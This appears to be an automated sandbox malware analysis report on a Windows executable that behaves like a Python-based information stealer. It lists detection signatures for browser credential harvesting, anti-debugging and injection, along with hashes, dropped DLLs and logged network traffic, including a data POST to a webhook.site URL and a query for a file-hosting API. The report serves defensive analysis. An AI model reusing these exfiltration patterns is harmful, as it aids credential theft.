Edit tour

Windows Analysis Report
4Vp6Xc8SFr.exe

Overview

General Information

Sample Name:	4Vp6Xc8SFr.exe
Original Sample Name:	b91a84a6995cb793ef6417222281295b.exe
Analysis ID:	840711
MD5:	b91a84a6995cb793ef6417222281295b
SHA1:	e8f8bf0cd0c38c339ceaadf3efca77d10bc8d43e
SHA256:	37a78be75ce8c01a57b12f589aacda2e8dd8fcd861bb09e279528d4dd0a1de24
Tags:	exe
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

May check the online IP address of the machine

Tries to harvest and steal browser information (history, passwords, etc)

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

PE file does not import any functions

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Binary contains a suspicious time stamp

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

4Vp6Xc8SFr.exe (PID: 5220 cmdline: C:\Users\user\Desktop\4Vp6Xc8SFr.exe MD5: B91A84A6995CB793EF6417222281295B)

4Vp6Xc8SFr.exe (PID: 6932 cmdline: C:\Users\user\Desktop\4Vp6Xc8SFr.exe MD5: B91A84A6995CB793EF6417222281295B)

cleanup

HTTP traffic detected: POST /6ef9c344-b801-4707-b071-bfe96f5a7949 HTTP/1.1Accept-Encoding: identityContent-Length: 443Host: webhook.siteContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close

Source: unknown

DNS traffic detected: queries for: api.gofile.io

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.10Connection: close
Source: global traffic	HTTP traffic detected: GET /jsonp/102.129.143.44 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.10Connection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.10Connection: close
Source: global traffic	HTTP traffic detected: GET /jsonp/102.129.143.44 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.10Connection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.10Connection: close
Source: global traffic	HTTP traffic detected: GET /jsonp/102.129.143.44 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.10Connection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.10Connection: close
Source: global traffic	HTTP traffic detected: GET /jsonp/102.129.143.44 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.10Connection: close

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8F5CBC	0_2_00007FF7DA8F5CBC
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8D6760	0_2_00007FF7DA8D6760
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8F4D70	0_2_00007FF7DA8F4D70
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E6664	0_2_00007FF7DA8E6664
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E2B54	0_2_00007FF7DA8E2B54
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8ECB54	0_2_00007FF7DA8ECB54
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8D1B90	0_2_00007FF7DA8D1B90
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E64B0	0_2_00007FF7DA8E64B0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8EF958	0_2_00007FF7DA8EF958
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8D9CE0	0_2_00007FF7DA8D9CE0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E0D00	0_2_00007FF7DA8E0D00
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8F2C80	0_2_00007FF7DA8F2C80
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8F311C	0_2_00007FF7DA8F311C
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8EF958	0_2_00007FF7DA8EF958
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8F8AB8	0_2_00007FF7DA8F8AB8
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E0AF4	0_2_00007FF7DA8E0AF4
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E8AF0	0_2_00007FF7DA8E8AF0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E1314	0_2_00007FF7DA8E1314
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E6664	0_2_00007FF7DA8E6664
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8F4FEC	0_2_00007FF7DA8F4FEC
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8ECFE8	0_2_00007FF7DA8ECFE8
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E2750	0_2_00007FF7DA8E2750
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8F5770	0_2_00007FF7DA8F5770
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E08F0	0_2_00007FF7DA8E08F0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E1110	0_2_00007FF7DA8E1110
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8F0904	0_2_00007FF7DA8F0904
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E1DC0	0_2_00007FF7DA8E1DC0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E4EA0	0_2_00007FF7DA8E4EA0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E6EE8	0_2_00007FF7DA8E6EE8
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E0F04	0_2_00007FF7DA8E0F04
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8ED668	0_2_00007FF7DA8ED668
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8F5CBC	1_2_00007FF7DA8F5CBC
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8F4D70	1_2_00007FF7DA8F4D70
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E2B54	1_2_00007FF7DA8E2B54
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8ECB54	1_2_00007FF7DA8ECB54
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8D1B90	1_2_00007FF7DA8D1B90
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E64B0	1_2_00007FF7DA8E64B0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8EF958	1_2_00007FF7DA8EF958
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8D9CE0	1_2_00007FF7DA8D9CE0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E0D00	1_2_00007FF7DA8E0D00
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8F2C80	1_2_00007FF7DA8F2C80
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8F311C	1_2_00007FF7DA8F311C
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8EF958	1_2_00007FF7DA8EF958
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8F8AB8	1_2_00007FF7DA8F8AB8
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E0AF4	1_2_00007FF7DA8E0AF4
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E8AF0	1_2_00007FF7DA8E8AF0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E1314	1_2_00007FF7DA8E1314
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E6664	1_2_00007FF7DA8E6664
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8F4FEC	1_2_00007FF7DA8F4FEC
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8ECFE8	1_2_00007FF7DA8ECFE8
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E2750	1_2_00007FF7DA8E2750
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8F5770	1_2_00007FF7DA8F5770
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8D6760	1_2_00007FF7DA8D6760
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E08F0	1_2_00007FF7DA8E08F0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E1110	1_2_00007FF7DA8E1110
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8F0904	1_2_00007FF7DA8F0904
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E1DC0	1_2_00007FF7DA8E1DC0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E4EA0	1_2_00007FF7DA8E4EA0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E6EE8	1_2_00007FF7DA8E6EE8
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E0F04	1_2_00007FF7DA8E0F04
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8ED668	1_2_00007FF7DA8ED668
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E6664	1_2_00007FF7DA8E6664
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD741930	1_2_00007FFCFD741930
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD7412F0	1_2_00007FFCFD7412F0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFDA9F460	1_2_00007FFCFDA9F460
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD98FE30	1_2_00007FFCFD98FE30
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD862766	1_2_00007FFCFD862766
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD862289	1_2_00007FFCFD862289
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD87BD60	1_2_00007FFCFD87BD60
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD8632E7	1_2_00007FFCFD8632E7
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD864C37	1_2_00007FFCFD864C37
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD87BF20	1_2_00007FFCFD87BF20
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFDA17A10	1_2_00007FFCFDA17A10
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD864165	1_2_00007FFCFD864165
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFDA039D0	1_2_00007FFCFDA039D0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD866A82	1_2_00007FFCFD866A82
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD86655A	1_2_00007FFCFD86655A
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD863FDA	1_2_00007FFCFD863FDA
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD8630C1	1_2_00007FFCFD8630C1
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD997AF0	1_2_00007FFCFD997AF0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD861EA1	1_2_00007FFCFD861EA1
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD867045	1_2_00007FFCFD867045
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD88B550	1_2_00007FFCFD88B550
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD86609B	1_2_00007FFCFD86609B
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD8CF700	1_2_00007FFCFD8CF700
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD8622E8	1_2_00007FFCFD8622E8
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD8621B7	1_2_00007FFCFD8621B7
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD866F23	1_2_00007FFCFD866F23
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD87F200	1_2_00007FFCFD87F200
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD88B1C0	1_2_00007FFCFD88B1C0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD866CB7	1_2_00007FFCFD866CB7
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD86114F	1_2_00007FFCFD86114F
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD8629CD	1_2_00007FFCFD8629CD
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD865D85	1_2_00007FFCFD865D85
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD863B93	1_2_00007FFCFD863B93
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD865169	1_2_00007FFCFD865169
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD997310	1_2_00007FFCFD997310
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD8672C0	1_2_00007FFCFD8672C0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD864633	1_2_00007FFCFD864633
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD99B020	1_2_00007FFCFD99B020
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD866EEC	1_2_00007FFCFD866EEC
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD87F060	1_2_00007FFCFD87F060
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD87EF00	1_2_00007FFCFD87EF00
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD86213F	1_2_00007FFCFD86213F

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: String function: 00007FFCFD862734 appears 190 times
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: String function: 00007FF7DA8D2770 appears 82 times
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: String function: 00007FFCFD8624B9 appears 42 times
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: String function: 00007FFCFD861EF1 appears 416 times
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: String function: 00007FFCFD86483B appears 42 times
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: String function: 00007FFCFD86300D appears 50 times
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: String function: 00007FFCFD864057 appears 264 times

Source: unicodedata.pyd.0.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found

Source: 4Vp6Xc8SFr.exe, 00000000.00000003.255478477.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.255782102.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.257428994.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.255603845.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.256078416.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.256998026.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.255019183.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.254728364.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.256710021.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.260232942.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.257593904.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.260139268.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.255987368.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.255842075.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.255519359.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.256624298.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.256260543.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.256526003.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.254382087.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.254898897.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.255729722.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.260478511.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.260683507.0000025976DCD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.256015494.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.255568176.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.257195509.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.256962278.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.257231477.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.254482843.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.257308921.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.257391615.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.259054046.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.256283797.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.254324143.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.255103306.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.254230532.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs 4Vp6Xc8SFr.exe
